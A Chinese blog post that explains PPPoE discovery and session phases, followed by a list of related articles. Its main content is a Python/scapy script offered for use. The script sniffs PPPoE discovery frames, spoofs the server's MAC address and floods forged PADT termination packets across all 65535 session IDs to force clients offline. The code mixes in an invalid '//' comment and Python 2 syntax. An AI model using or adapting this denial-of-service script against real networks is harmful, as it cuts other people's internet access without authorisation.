python pppoe拨号_PPPoE***1:PADT断开连接

最新推荐文章于 2022-07-06 19:32:45 发布
最新推荐文章于 2022-07-06 19:32:45 发布
阅读量690 收藏 2
点赞数
文章标签: python pppoe拨号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33100285/article/details/114912137
版权

PPPoE协议是一个非常良好的协议,它具有带宽控制、用户认证、防ARP病毒等功能,基本上可以满足局域网对用户的管理,多用于adsl拨号,许多运营商就是通过pppoe拨号对用户实现宽带接入;

本人在使用PPPoE协议过程中,对PPPoE协议进行了学习,笔记如下:

PPPoE认证分为两个阶段:

第一阶段:发现阶段

1.pppoe client广播发送PADI数据包建立连接;

2.pppoe server回复一个PADO单播帧;

3.client回复一个PADR单播请求,期望进行会话;

4.pppoe server回复一个PADS数据包,同意进行下一步协商(包中携带一个sessionid,作为用户的凭证之一)

第二阶断:会话阶段

双方使用PPP的LCP协议协商链路,NCP进行用户名密码检验,双方完成通讯。

在第一阶段pppoe会话重要依据就是双方的mac地址,在和sessionid;

在用户下线的时候,用户会发送PADT数据包进行协商,断开会话连接;

那么问题来了:如果我们冒充服务器(客户),向客户(服务器)发送伪造的特定格式的PADT数据包,会不会断开会话?基于这一思路,我利用python的scapy模块写出了一个程序,经过测试,这个思路完全正确,可以达到断开会话的目的;

***的原理:在pppoe client发送广播帧发送discovery时,监听网络,得到client mac地址,再对client发送一个PADT数据包,包中包含sessionid,这时就可以使client误以为server结束了连接。注意:在发送伪造数据包时,双方应该已经完成了第一阶段的会话;

由于我们不清楚客户获得的sessionid,所以对于sessionid的取值直接使用了数据字典,因此为了破坏连接需要发送65535个数据包;

***的python代码如下:from  scapy.all import *

while True:

try:

a=sniff(filter='pppoed',count=1)

c=Ether()/PPPoE()

c.dst=a[0].src

c.src="00:0c:29:be:f5:21"  //注意:这个src是你pppoe服务器的mac地址,请酌情手工修改

c.type=0x8863

c.payload.code=0xa7

c.payload.sessionid=range(65535)

c.payload.len=0

sendp(c)

print "We have attack one,his/her mac address is "+a[0].src

except:

continue

某友善的微笑
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PPPOE拨号详解——保活,断链.docx
03-30
学习笔记原文分享 1、PPPOE正常拨号过程 一、发现阶段 Wireshark 过滤ppp后 会话阶段和断链阶段显示不出来 记录首条和末条序号,取消过滤,再上下看 二、会话阶段 LCP:协商MTU、认证方式 同意的一方发ACK、不同意的一方发reject 再次进行参数确认 NCP:认证过程 2、建立成功后,保活,维持链路(会发生在很多位置) 3、断开链路,由路由器断开 4、断开链路,由服务器断开 发送多次echo request后 Termina request服务器不回复Ack PADT不回复 重新进入发现阶段
PPPOE拨号过程
wt0427的专栏
05-24 1445
索引 日 志 内 容 1 1738:发送PADR. 2 1738:接收PADS,Session-ID=0x361D,AC-MAC=286ED421146A. 3 1738:LCP tx Req,MRU=05D4;Magic=0001A93C; 4 1738:LCP RX Req,MRU=05D4;Auth=C2;23;05;Magic=010043FE; 5 1738:LCP tx Ac
PPP协议与WAN技术
先剃度再出家
07-15 3640
一、广域网接口 ·广域网接口进化史 路由器有什么功能:相对与交换机,路由器接口类型多,兼容性强。 以前在运营商接入用户之前并不是以太网口,所以路由器承担了运营商和用户之间的转换工作,它必须具有兼容性强的特点。 ·以太网接口 ·分类 T:表示双绞线; TX :表示2对高质量的双绞线; FX :表示2根光纤。 ·POS接口 OC-n: Optical Carrier level n (光载体等级)是光纤传输的一-种单位,最小的单位为OC-1 ,其传输数据量..
tp路由服务器无响应,路由器无法PPPOE链接上网老显示服务器无响应
weixin_30039395的博客
08-05 2638
路由器无法PPPOE链接上网老显示服务器无响应1.版本信息:H-Ver = WR742N 5.0 00000000 : S-Ver = 5.6.21 Build 130417 Rel.73893n2.系统日志;0days, 00:13:56, System: Logs were cleared.0days, 00:13:58, PPPOE SM: retry.0days, 00:13:58, P...
广域网宽带接入技术二PPPoE原理及配置
weixin_42227328的博客
01-27 5708
二、PPPoE原理及配置 1、PPPoE的基本原理 运营商希望把一个站点上的多台主机连接到同一台远程接入设备,并实现对用户进行认证、授权和计费、访问控制的功能,通过应用RFC2516定义的PPPoE(Point-to-Point Protcol over Ethernet)技术很好的解决了以太网接入应用中的用户认证问题。将PPP帧封装到以太帧,使用PPP协议(点到点协议)在以太网上传输PPP报文的技术称为PPPoE。 PPP是一种数据链路层协议,遵循HDLC(高级数据链路控制协议)族的一般报文格式。它使用链
pppoe工作原理
weixin_48236860的博客
07-06 1526
目录pppoe工作过程图报文分析NCP协商最开始发request不带ip 服务器回复NAK时带上ip过程剖析发现阶段:会话阶段:Lcp协商链路协商,一些类似mtu的参数:认证过程:PAP/CHAP/MSCHAPNcp协商:IPCP协议:Pppoe断开常见错误:认证失败:无法连接:掉线:Onu:广播PADI(一下单播)服务器:分析onu需要的业务和自己可以提供的业务相同就回:PADOOnu:接收最早收到的PADO(和DHCP discover一样),然后回复:PADR服务器:响应PADS,带上seccess
Python 实现PPPOE自动拨号
qq_35911309的博客
08-21 2758
文章目录一、WIN10添加PPPoE拨号连接设置二、python 实现 一、WIN10添加PPPoE拨号连接设置 1.1 右键点击桌面右下角的网络图标,打开网络和共享中心 1.2 在打开的网络和Internet中,从 拨号进入 设置新连接 1.3 在设置连接或网络向导中,选择 连接到Internet,并进入 新连接的设置 1.4 在连接到Internet对连接方式进行选择,一般来说宽带就是PPPoE模式 1.5 在选择之后,就是对用户名和密码,及名称进行设定 二、python 实现 代码如下(
[PPPOE]报文交互分析
热门推荐
俗科技的博客
08-18 1万+
1.简介 PPPoE(PPP Over Ethernet)协议是在点到点链路上承载网络层数据包的一种链路层协议,由于它能够提供用户验证、易于扩充,并且支持同/异步通信,因而获得广泛应用。 PPPoE主要协议标准:RFC2516 “图-PPPOE交互示意图”2.交互2.1.发现阶段(PPPoE Discovery) PPPOE发现阶段的交互过程主要有四个包,即PADI,PADO,PADR,P
基于Linux内核模式的PPPoE优化与实现
08-13
本文主要描述了PPPoE内核模式拨号的设计与实现,该模式将封包动作从用户空间转移到内核空间,从而大大降低了内核空间与用户空间切换的次数,目前这种内核模式下的拨号已经大量地应用于各种网关产品中。
PPPoE协议中文(RFC 2516).zip
09-22
1、 介绍 2、 约定 3、 协议概述 4、 有效载荷 5、 发现阶段 5.1、 PPPoE活动发现初始(PADI) 包 5.2、 PPPoE活动发现提议...5.5、 PPPoE活动发现终止(PADT) 包 6、 PPP会话阶段 7、 LCP考虑 8、 其他考虑 9、 安全考虑
python adsl拨号
12-11
python写的adsl拨号程序,连接时可以获取本次拨号的IP地址,支持自动过滤已经使用过的IP地址
PPPOE 协议学习及重点内容总结
11-26
第1章 概 述 1 1.1 PPPOE协议的基本概念 1 ...2.1.3.6 PADT(PPPOE Active Discovery Terminate)报文 7 2.2 总结 7 2.3 思考 8 第3章 PPPOE的会话阶段 9 3.1 PPPOE的会话过程 9 3.2 总结 9 3.3 思考 10
PADT数据包的构造
06-07
PPPOE会话终止分析 PADT数据包的生成。 主要的编译环境为LINUX C
PPPoE协议发现阶段交互及FPGA实现过程
s-stone的博客
10-14 1988
文章目录发现阶段交互过程PADIPADOPADRPADS 发现阶段交互过程 PPPoE ( Point to Point Protocol over Ethernet ),基于以太网的点对点协议,包括发现阶段和会话阶段。发现阶段,即 PPPoE Discovery,目的是获取客户端MAC地址并建立连接。发现阶段包括PADI、PADO、PADR、PADS四个阶段。发现阶段结束后,就进入标准PPP会话阶段。发现阶段交互过程如下图所示: 图1 PPPoE发现阶段交互过程 数据帧格式如下图所示: 图2 PP
python实现电脑自动拨号换ip(pppoe
林羽的博客
11-25 2549
python实现电脑自动拨号换ip import os import time g_adsl_account = {“name”: “dianxin”, “username”: “useradmin”, “password”: “j4rpz”} class Adsl(object): # init : name: adsl名称 def init(self): self.name = g_adsl_...
python pppoe拨号_批处理版普通宽带连接ADSL(PPPOE)创建工具
weixin_27038261的博客
03-01 595
:: 涉及到 rasphone.pbk 文件的编码和 find 查找兼容编码的问题, 此工具生成的宽带连接名称不用中文.:: 关于两个键值 DialParamsUID, Guid, 本工具不生成, 代由系统自动生成.:: 打开 ncpa.cpl 刷新查看或 运行 rasdial ... 后, 系统会自动生成相关的键值.:: Guid 的键值也可用 MS 的工具 UUIDGEN 来生成, 下载: h...
python pppoe拨号_只要十分钟,用Python实现自动化水军评论
weixin_35992471的博客
03-01 256
自己在写文章的时候,也有到处去逛一逛,渐渐发现了一些有意思的事,经常会有人用同样的评论到处刷,不知道是为了加没什么用的积分,还是纯粹为了表达楼主好人。那么问题来了,这种无聊的事情当然最好能够自动化咯,自己也来试了一把,纯属娱乐。登陆要评论当然要能够先进行登陆,采用 requests库进行处理,尝试能否看到自己的消息列表:msg_url ="http://msg.csdn.net/"r = requ...
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
pppoe会话建立和终结过程中有哪些报文
07-15
1. PADI(PPPoE Active Discovery Initiation)报文:客户端发送PADI报文以广播查找可用的PPP服务器。该报文包含客户端的MAC地址和所需的服务名称。 2. PADO(PPPoE Active Discovery Offer)报文:服务器在收到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值